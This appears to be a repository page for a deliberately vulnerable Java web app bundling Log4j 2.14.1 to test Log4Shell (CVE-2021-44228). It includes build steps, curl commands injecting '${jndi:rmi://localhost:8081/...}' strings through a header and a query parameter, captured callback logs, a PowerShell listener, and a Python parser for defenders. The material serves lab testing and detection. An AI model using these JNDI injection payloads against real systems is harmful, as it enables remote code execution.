Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
This is a deliberately vulnerable Java web application bundling a Log4j version affected by Log4Shell (CVE-2021-44228).
Readme
# Log4Shell Vulnerable Application(l4s-vulnapp)
This is a deliberately vulnerable Java web application bundling Log4j (2.14.1), which is affected by [Log4Shell](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228) (CVE-2021-44228).
## Verified environment and various versions
- [AdoptOpenJDK 17.0.10+7](https://adoptium.net/temurin/releases/?os=windows&arch=x64&package=jdk&version=17)
- [Gradle 8.6](https://gradle.org/next-steps/?version=8.6&format=all)
- [Gretty 4.1.2](https://plugins.gradle.org/plugin/org.gretty)
- [Apache Tomcat 10.1.15](https://tomcat.apache.org/tomcat-10.1-doc/changelog.html#Tomcat_10.1.15_(schultz))
- [Apache Log4j Core 2.14.1](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.14.1)
## Preparation
- Download and extract the [AdoptOpenJDK](https://adoptium.net/temurin/releases/) zip file.
- Set the PATH and JAVA_HOME environment variables.
- Run `java --version` to check that AdoptOpenJDK works properly.
[Note]
If you want to change the JDK version, Tomcat port, etc., edit build.gradle.
## Build and Run
Run the Gradle wrapper, which builds and starts the app from build.gradle:
```
# on Linux
./gradlew appRun
# on Windows
.\gradlew.bat appRun
```
Top-level URL of the running app:
```
http://localhost:8080/l4s-vulnapp/
```
[Note]
Log4Shell is triggered only when the app actually logs something through Log4j.
For example, the servlet behind the following URL logs request data, so accessing it exercises the vulnerable code path.
```
http://localhost:8080/l4s-vulnapp/servlet
```
You can check for Log4Shell by tampering with the "x-param" query parameter or by adding an "x-log" header to the HTTP request.
Both values are logged by Log4j, so a JNDI lookup string placed in either of them is evaluated.
The lookup only completes if a listening server is running at localhost:8081.
```
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D
```
## Verification Results
- HTTP Request
```
GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/l4s-vulnapp/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: ja,en-US;q=0.9,en;q=0.8
```
- HTTP Response
```
HTTP/1.1 200
Content-Type: text/plain;charset=utf-8
Content-Length: 62
Date: Fri, 15 Mar 2024 18:42:56 GMT
Keep-Alive: timeout=60
Connection: keep-alive
Hello
Logging to console using vulnerable Log4j2 by parameter
```
- RMI request received from l4s-vulnapp (output of the listening server, see Option below)
```
2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
2024/03/16 03:42:55: [Hex data] ===== start =====
2024/03/16 03:42:56: 00000000 4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00 JRMI..K.........
2024/03/16 03:42:56: 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2024/03/16 03:42:56: [Hex data] ===== end =====
2024/03/16 03:42:56: [Raw data] ===== start =====
2024/03/16 03:42:56: JRMI
2024/03/16 03:42:56: [Raw data] ===== end =====
```
## Option
l4s-ls.ps1 starts a listening server; run the script from Windows PowerShell or Command Prompt.
The server accepts binary connections such as the LDAP and RMI callbacks made by the vulnerable app and displays their contents in hex and raw form.
If the script misbehaves, stop it with Ctrl + C.
[Caution]
When running this script for the first time, select "Private Network" in the Windows pop-up that appears.
```
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081
```
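To make sense of the bytes the listening server prints (the "RMI request" output above), here is an added Python example that is not part of l4s-vulnapp or l4s-ls.ps1. It parses the hexdump lines from a constructed copy of that output, reassembles the bytes and identifies the callback as a Java RMI transport handshake (magic `JRMI`, version 2, protocol byte 0x4B = StreamProtocol); as a generalisation beyond the page it also recognises a BER-encoded LDAP message (leading SEQUENCE tag 0x30). The log line layout is assumed from the README's sample output.

```python
import re
import struct

# Constructed sample modelled on the listener output shown in the README (not a real capture).
SAMPLE_LOG = """\
2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
2024/03/16 03:42:55: [Hex data] ===== start =====
2024/03/16 03:42:56: 00000000 4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00 JRMI..K.........
2024/03/16 03:42:56: 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2024/03/16 03:42:56: [Hex data] ===== end =====
"""

# "<date> <time>: <8-hex offset> <up to 16 hex byte pairs> <ascii column>"; layout assumed from the README.
HEX_LINE = re.compile(r"^\S+ \S+: [0-9A-Fa-f]{8} ((?:[0-9A-Fa-f]{2} ){1,16})")

# Protocol byte that follows the JRMI magic and version in the Java RMI transport handshake.
RMI_PROTOCOLS = {0x4B: "StreamProtocol", 0x4C: "SingleOpProtocol", 0x4D: "MultiplexProtocol"}


def hexdump_to_bytes(log_text: str) -> bytes:
    """Reassemble the raw bytes from every hexdump line in the listener log."""
    data = bytearray()
    for line in log_text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            data += bytes.fromhex(m.group(1))
    return bytes(data)


def classify_callback(data: bytes) -> dict:
    """Name the JNDI callback protocol from the first bytes the listener received."""
    if len(data) >= 7 and data[:4] == b"JRMI":
        version, proto = struct.unpack(">HB", data[4:7])
        return {"protocol": "rmi", "version": version,
                "mode": RMI_PROTOCOLS.get(proto, "unknown(0x%02X)" % proto)}
    if data[:1] == b"\x30":  # BER SEQUENCE: an LDAPMessage (e.g. a bind request) starts this way
        return {"protocol": "ldap"}
    return {"protocol": "unknown"}


def analyze_listener_log(log_text: str) -> dict:
    """Hexdump text in, protocol verdict out."""
    return classify_callback(hexdump_to_bytes(log_text))


if __name__ == "__main__":
    print(analyze_listener_log(SAMPLE_LOG))
```

The verdict tells a defender which JNDI transport the vulnerable app reached out on, which is the evidence to pair with the `${jndi:...}` string found in the request log.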
## References
- [GitHub - tothi/log4shell-vulnerable-app](https://github.com/tothi/log4shell-vulnerable-app)
- [ももいろテクノロジー - Writing nc (netcat) in PowerShell (2015/4/16)](https://inaz2.hatenablog.com/entry/2015/04/16/025953)
File Snapshot
[4.0K] /data/pocs/54b2eb715f726853c04a43dc640b22ffcfa08f88
├── [ 602] build.gradle
├── [4.0K] gradle
│   └── [4.0K] wrapper
│       ├── [ 42K] gradle-wrapper.jar
│       └── [ 250] gradle-wrapper.properties
├── [8.5K] gradlew
├── [2.8K] gradlew.bat
├── [3.6K] l4s-ls.ps1
├── [4.4K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] l4svuln
        │       └── [1.5K] VulnServlet.java
        ├── [4.0K] resources
        │   └── [ 407] log4j2.properties
        └── [4.0K] webapp
            ├── [ 326] index.html
            └── [4.0K] WEB-INF
                └── [ 489] web.xml

9 directories, 11 files